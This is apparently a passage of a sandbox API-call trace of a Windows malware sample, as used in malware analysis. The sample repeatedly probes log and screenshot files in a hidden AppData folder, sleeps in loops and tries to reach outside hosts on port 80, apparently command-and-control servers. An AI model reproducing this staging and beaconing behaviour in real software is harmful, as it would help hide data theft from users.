CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.819] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.819] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.819] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.819] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.819] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.819] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.819] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.819] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.819] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.819] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.819] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.819] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.820] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0203.820] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.820] Sleep (dwMilliseconds=0x7d0) [0203.833] Sleep (dwMilliseconds=0x7d0) [0203.855] Sleep (dwMilliseconds=0x7d0) [0203.864] Sleep (dwMilliseconds=0x7d0) [0203.881] Sleep (dwMilliseconds=0x7d0) [0203.895] Sleep (dwMilliseconds=0x7d0) [0203.917] Sleep (dwMilliseconds=0x7d0) [0203.927] Sleep (dwMilliseconds=0x7d0) [0203.942] Sleep (dwMilliseconds=0x7d0) [0203.961] Sleep (dwMilliseconds=0x7d0) [0203.973] Sleep (dwMilliseconds=0x7d0) [0203.990] Sleep (dwMilliseconds=0x7d0) [0204.004] Sleep (dwMilliseconds=0x7d0) [0204.024] Sleep (dwMilliseconds=0x7d0) [0204.036] Sleep (dwMilliseconds=0x7d0) [0204.051] Sleep (dwMilliseconds=0x7d0) [0204.067] Sleep (dwMilliseconds=0x7d0) [0204.083] Sleep (dwMilliseconds=0x7d0) [0204.102] Sleep (dwMilliseconds=0x7d0) [0204.114] Sleep (dwMilliseconds=0x7d0) [0204.130] socket (af=2, type=1, protocol=6) returned 0xa44 [0204.130] getaddrinfo (in: pNodeName="www.watdomenrendi05.com", pServiceName="80", pHints=0x6f0c298*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c2c8 | out: ppResult=0x6f0c2c8*=0x0) returned 11001 [0204.142] Sleep (dwMilliseconds=0x7d0) [0204.145] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.145] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.145] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0204.145] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.145] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.145] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.145] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.145] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.146] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.146] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.146] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.146] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.146] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.146] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.146] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.146] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.146] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.146] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.146] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.146] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.146] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.146] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.146] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.147] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.147] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.147] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.147] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.147] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.147] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.147] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.147] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.147] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.147] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.147] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0204.147] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.147] Sleep (dwMilliseconds=0x7d0) [0204.164] Sleep (dwMilliseconds=0x7d0) [0204.176] Sleep (dwMilliseconds=0x7d0) [0204.192] Sleep (dwMilliseconds=0x7d0) [0204.208] Sleep (dwMilliseconds=0x7d0) [0204.235] Sleep (dwMilliseconds=0x7d0) [0204.262] Sleep (dwMilliseconds=0x7d0) [0204.270] Sleep (dwMilliseconds=0x7d0) [0204.285] Sleep (dwMilliseconds=0x7d0) [0204.306] Sleep (dwMilliseconds=0x7d0) [0204.317] Sleep (dwMilliseconds=0x7d0) [0204.334] Sleep (dwMilliseconds=0x7d0) [0204.348] Sleep (dwMilliseconds=0x7d0) [0204.368] Sleep (dwMilliseconds=0x7d0) [0204.379] Sleep (dwMilliseconds=0x7d0) [0204.395] Sleep (dwMilliseconds=0x7d0) [0204.412] Sleep (dwMilliseconds=0x7d0) [0204.426] Sleep (dwMilliseconds=0x7d0) [0204.526] Sleep (dwMilliseconds=0x7d0) [0204.535] Sleep (dwMilliseconds=0x7d0) [0204.555] Sleep (dwMilliseconds=0x7d0) [0204.566] Sleep (dwMilliseconds=0x7d0) [0204.582] Sleep (dwMilliseconds=0x7d0) [0204.602] Sleep (dwMilliseconds=0x7d0) [0204.628] Sleep (dwMilliseconds=0x7d0) [0204.629] Sleep (dwMilliseconds=0x7d0) [0204.644] Sleep (dwMilliseconds=0x7d0) [0204.664] Sleep (dwMilliseconds=0x7d0) [0204.675] Sleep (dwMilliseconds=0x7d0) [0204.691] socket (af=2, type=1, protocol=6) returned 0x534 [0204.693] getaddrinfo (in: pNodeName="www.barrelandlens.com", pServiceName="80", pHints=0x6f0c638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c668 | out: ppResult=0x6f0c668*=0x0) returned 11001 [0204.740] Sleep (dwMilliseconds=0x7d0) [0204.753] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.753] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.754] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0204.754] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.754] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.754] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.755] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.755] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.755] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.755] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0204.755] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0204.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.755] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 